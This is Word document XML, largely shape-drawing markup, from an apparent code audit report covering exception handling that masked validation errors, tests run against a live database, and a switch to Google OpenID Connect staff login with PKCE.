                <v:shape id="Shape 2345" o:spid="_x0000_s1031" style="position:absolute;left:11334;top:6096;width:2858;height:1428;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="2857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XvnxgAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Ba8JA&#10;FITvhf6H5RV6q5vaKhJdpdQKehA06v2RfWaD2bdpdhtjf70rCB6HmfmGmcw6W4mWGl86VvDeS0AQ&#10;506XXCjY7xZvIxA+IGusHJOCC3mYTZ+fJphqd+YttVkoRISwT1GBCaFOpfS5IYu+52ri6B1dYzFE&#10;2RRSN3iOcFvJfpIMpcWS44LBmr4N5afszypY11UZ5ODn9LveZuZy2MxX7fxfqdeX7msMIlAXHuF7&#10;e6kV9D8+B3B7E5+AnF4BAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAA&#10;AAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAA&#10;CwAAAAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAW3l758YAAADdAAAA&#10;DwAAAAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPoCAAAAAA==&#10;" path="m9525,l276225,v2630,,4875,918,6735,2778c284820,4638,285750,6883,285750,9525r,123825c285750,135979,284820,138212,282960,140072v-1860,1860,-4105,2791,-6735,2803l9525,142875v-2630,-12,-4875,-943,-6735,-2803c930,138212,,135979,,133350l,9525c,6883,930,4638,2790,2778,4650,918,6895,,9525,xe" fillcolor="#edf2f6" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,285750,142875"/>
                </v:shape>
                <v:shape id="Shape 2348" o:spid="_x0000_s1032" style="position:absolute;left:28098;top:6096;width:9335;height:1428;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="933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bxQAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9da8Iw&#10;FH0f+B/CFfYiM52KzM4oImwTFNx0DPZ2aa5Nsblpm6zt/v3yIOzxcL6X696WoqXGF44VPI4TEMSZ&#10;0wXnCj7PLw9PIHxA1lg6JgW/5GG9GtwtMdWu4w9qTyEXMYR9igpMCFUqpc8MWfRjVxFH7uIaiyHC&#10;Jpe6wS6G21JOkmQuLRYcGwxWtDWUXU8/VsHr5n3BX3vTjY5v7eG8qOvtN9dK3Q/7zTOIQH34F9/c&#10;O61gMp3FufFNfAJy9QcAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAA&#10;AAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAAL&#10;AAAAAAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQAaMc+bxQAAAN0AAAAP&#10;AAAAAAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA+QIAAAAA&#10;" path="m9525,l923925,v2630,,4875,918,6735,2778c932520,4638,933450,6883,933450,9525r,123825c933450,135979,932520,138212,930660,140072v-1860,1860,-4105,2791,-6735,2803l9525,142875v-2630,-12,-4875,-943,-6735,-2803c930,138212,,135979,,133350l,9525c,6883,930,4638,2790,2778,4650,918,6895,,9525,xe" fillcolor="#edf2f6" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,933450,142875"/>
                </v:shape>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="008125F0" w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>V-19</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="008125F0" w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">d </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008125F0" w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Validation failures masked as server errors.</w:t>
      </w:r>
      <w:r w:rsidR="008125F0" w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Eleven </w:t>
      </w:r>
      <w:r w:rsidR="008125F0" w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>catch (\Exception)</w:t>
      </w:r>
      <w:r w:rsidR="008125F0" w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> clauses swallowed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7856F588" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRPr="005C54CB" w:rsidRDefault="008125F0">
      <w:pPr>
        <w:spacing w:after="191" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="24" w:right="16"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ValidationException</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returning 500 instead of 422 and hiding input-validation problems from clients and monitoring alike.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ED1CE81" w14:textId="46B3D127" w:rsidR="00095011" w:rsidRPr="005C54CB" w:rsidRDefault="008125F0" w:rsidP="00095011">
      <w:pPr>
        <w:spacing w:after="937"/>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7744" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="69F2B34A" wp14:editId="1ED509A2">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>5342632</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-19871</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="981075" cy="133350"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="30608" name="Group 30608"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="981075" cy="133350"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="981075" cy="133350"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="2342" name="Shape 2342"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="981075" cy="133350"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="981075" h="133350">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="971550" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="974180" y="0"/>
                                  <a:pt x="976425" y="930"/>
                                  <a:pt x="978285" y="2778"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="980144" y="4638"/>
                                  <a:pt x="981075" y="6896"/>
                                  <a:pt x="981075" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="981075" y="123825"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="981075" y="126454"/>
                                  <a:pt x="980144" y="128687"/>
                                  <a:pt x="978285" y="130547"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="976425" y="132407"/>
                                  <a:pt x="974180" y="133338"/>
                                  <a:pt x="971550" y="133350"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6894" y="133338"/>
                                  <a:pt x="4649" y="132407"/>
                                  <a:pt x="2789" y="130547"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="929" y="128687"/>
                                  <a:pt x="0" y="126454"/>
                                  <a:pt x="0" y="123825"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="0" y="9525"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="0" y="6896"/>
                                  <a:pt x="929" y="4638"/>
                                  <a:pt x="2789" y="2778"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="4649"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608" style="width:77.25pt;height:10.5pt;position:absolute;z-index:-2147483514;mso-position-horizontal-relative:text;mso-position-horizontal:absolute;margin-left:420.68pt;mso-position-vertical-relative:text;margin-top:-1.5647pt;" coordsize="9810,1333">
                <v:shape id="Shape 2342" style="position:absolute;width:9810;height:1333;left:0;top:0;" coordsize="981075,133350" path="m9525,0l971550,0c974180,0,976425,930,978285,2778c980144,4638,981075,6896,981075,9525l981075,123825c981075,126454,980144,128687,978285,130547c976425,132407,974180,133338,971550,133350l9525,133350c6894,133338,4649,132407,2789,130547c929,128687,0,126454,0,123825l0,9525c0,6896,929,4638,2789,2778c4649,930,6894,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V-19</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">e </w:t>
      </w:r>
      <w:r w:rsidR="00095011">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Tests ran against the live database.</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phpunit.xml</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> had both </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>DB_</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> lines commented out, so </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> artisan test </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ran against </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">whatever </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.env</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> pointed at. Any test using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>RefreshDatabase</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> would have </w:t>
      </w:r>
      <w:r w:rsidR="00095011" w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>been translated</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65EB7FBE" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRPr="0011533D" w:rsidRDefault="008125F0" w:rsidP="00095011">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:ind w:left="24"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0011533D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>6. OAuth 2.0 / OpenID Connect implementation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16908E84" w14:textId="7B6B8CF2" w:rsidR="00345BB3" w:rsidRPr="005C54CB" w:rsidRDefault="00345BB3" w:rsidP="00095011">
      <w:pPr>
        <w:spacing w:after="356" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="29" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42B82669" w14:textId="77777777" w:rsidR="00345BB3"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6.1 What it does and why this feature</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B7E3400" w14:textId="77777777" w:rsidR="00095011" w:rsidRPr="00095011" w:rsidRDefault="00095011" w:rsidP="00095011">
      <w:pPr/>
    </w:p>
    <w:p w14:paraId="2DA6566C" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRPr="005C54CB" w:rsidRDefault="008125F0">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We implemented </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Google OpenID Connect sign-in using the Authorization Code flow with PKCE</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">, applied to the staff </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>login</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> feature.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="614E43A0" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
      <w:pPr>
        <w:spacing w:after="0"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It is the deliberate replacement for the public self-registration removed in V-01, and the two halves reinforce each other:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DED2FDF" w14:textId="77777777" w:rsidR="00095011" w:rsidRPr="005C54CB" w:rsidRDefault="00095011">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="24" w:right="16"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="10194" w:type="dxa"/>
        <w:tblInd w:w="38" w:type="dxa"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:tblCellMar>
          <w:left w:w="113" w:type="dxa"/>
          <w:right w:w="115" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1093"/>
        <w:gridCol w:w="4801"/>
        <w:gridCol w:w="4300"/>
      </w:tblGrid>
      <w:tr w:rsidR="00345BB3" w:rsidRPr="005C54CB" w14:paraId="12CE473D" w14:textId="77777777" w:rsidTr="00095011">
        <w:trPr>
          <w:trHeight w:val="435"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="109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tcPr>
          <w:p w14:paraId="12853B87" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRPr="005C54CB" w:rsidRDefault="00345BB3">
            <w:pPr>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="480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1C495AD3"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Identity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="430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452E0DA5" w14:textId="07D7F1C0" w:rsidR="00345BB3" w:rsidRPr="005C54CB" w:rsidRDefault="00095011">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="9"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Authorization</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00345BB3" w:rsidRPr="005C54CB" w14:paraId="4E2734AC" w14:textId="77777777" w:rsidTr="00095011">
        <w:trPr>
          <w:trHeight w:val="435"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="109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E8FAFE7"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Before</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="480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395BE1FF" w14:textId="21800EC1"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8768" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3F987AAD" wp14:editId="57A70CEC">
                      <wp:simplePos x="0" y="0"/>
                      <wp:positionH relativeFrom="column">
                        <wp:posOffset>1795462</wp:posOffset>
                      </wp:positionH>
                      <wp:positionV relativeFrom="paragraph">
                        <wp:posOffset>-27524</wp:posOffset>
                      </wp:positionV>
                      <wp:extent cx="695325" cy="133350"/>
                      <wp:effectExtent l="0" t="0" r="0" b="0"/>
                      <wp:wrapNone/>
                      <wp:docPr id="30373" name="Group 30373"/>
                      <wp:cNvGraphicFramePr/>
                      <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                        <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                          <wpg:wgp>
                            <wpg:cNvGrpSpPr/>
                            <wpg:grpSpPr>
                              <a:xfrm>
                                <a:off x="0" y="0"/>
                                <a:ext cx="695325" cy="133350"/>
                                <a:chOff x="0" y="0"/>
                                <a:chExt cx="695325" cy="133350"/>
                              </a:xfrm>
                            </wpg:grpSpPr>
                            <wps:wsp>
                              <wps:cNvPr id="2363" name="Shape 2363"/>
                              <wps:cNvSpPr/>
                              <wps:spPr>
                                <a:xfrm>
                                  <a:off x="0" y="0"/>
                                  <a:ext cx="695325" cy="133350"/>
                                </a:xfrm>
                                <a:custGeom>
                                  <a:avLst/>
                                  <a:gdLst/>
                                  <a:ahLst/>
                                  <a:cxnLst/>
                                  <a:rect l="0" t="0" r="0" b="0"/>
                                  <a:pathLst>
                                    <a:path w="695325" h="133350">
                                      <a:moveTo>
                                        <a:pt x="9525" y="0"/>
                                      </a:moveTo>
                                      <a:lnTo>
                                        <a:pt x="685800" y="0"/>
                                      </a:lnTo>
                                      <a:cubicBezTo>
                                        <a:pt x="688430" y="0"/>
                                        <a:pt x="690675" y="918"/>
                                        <a:pt x="692535" y="2778"/>
                                      </a:cubicBezTo>
                                      <a:cubicBezTo>
                                        <a:pt x="694395" y="4638"/>
                                        <a:pt x="695325" y="6883"/>
                                        <a:pt x="695325" y="9525"/>
                                      </a:cubicBezTo>
                                      <a:lnTo>
                                        <a:pt x="695325" y="123825"/>
                                      </a:lnTo>
                                      <a:cubicBezTo>
                                        <a:pt x="695325" y="126454"/>
                                        <a:pt x="694395" y="128687"/>
                                        <a:pt x="692535" y="130547"/>
                                      </a:cubicBezTo>
                                      <a:cubicBezTo>
                                        <a:pt x="690675" y="132407"/>
                                        <a:pt x="688430" y="133338"/>
                                        <a:pt x="685800" y="133350"/>
                                      </a:cubicBezTo>
                                      <a:lnTo>
                                        <a:pt x="9525" y="133350"/>
                                      </a:lnTo>
                                      <a:cubicBezTo>
                                        <a:pt x="6895" y="133338"/>
                                        <a:pt x="4650" y="132407"/>
                                        <a:pt x="2790" y="130547"/>
                                      </a:cubicBezTo>
                                      <a:cubicBezTo>
                                        <a:pt x="930" y="128687"/>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373" style="width:54.75pt;height:10.5pt;position:absolute;z-index:-2147483493;mso-position-horizontal-relative:text;mso-position-horizontal:absolute;margin-left:141.375pt;mso-position-vertical-relative:text;margin-top:-2.16736pt;" coordsize="6953,1333">
                      <v:shape id="Shape 2363" style="position:absolute;width:6953;height:1333;left:0;top:0;" coordsize="695325,133350" path="m9525,0l685800,0c688430,0,690675,918,692535,2778c694395,4638,695325,6883,695325,9525l695325,123825c695325,126454,694395,128687,692535,130547c690675,132407,688430,133338,685800,133350l9525,133350c6895,133338,4650,132407,2790,130547c930,128687,0,126454,0,123825l0,9525c0,6883,930,4638,2790,2778c4650,918,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self-asserted</w:t>
            </w:r>
            <w:r w:rsidR="00095011">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anyone could POST </w:t>
            </w:r>
            <w:r w:rsidRPr="005C54CB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>role: admin</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="430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4F9CC81" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRPr="005C54CB" w:rsidRDefault="008125F0">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="9"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none</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00345BB3" w:rsidRPr="005C54CB" w14:paraId="313F612B" w14:textId="77777777" w:rsidTr="00095011">
        <w:trPr>
          <w:trHeight w:val="435"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="109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11C9315"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After</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="480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0437C59" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRPr="005C54CB" w:rsidRDefault="008125F0">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="7"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asserted by Google</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="430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8063581" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRPr="005C54CB" w:rsidRDefault="008125F0">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="9"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granted by the shop owner</w:t>
            </w:r>
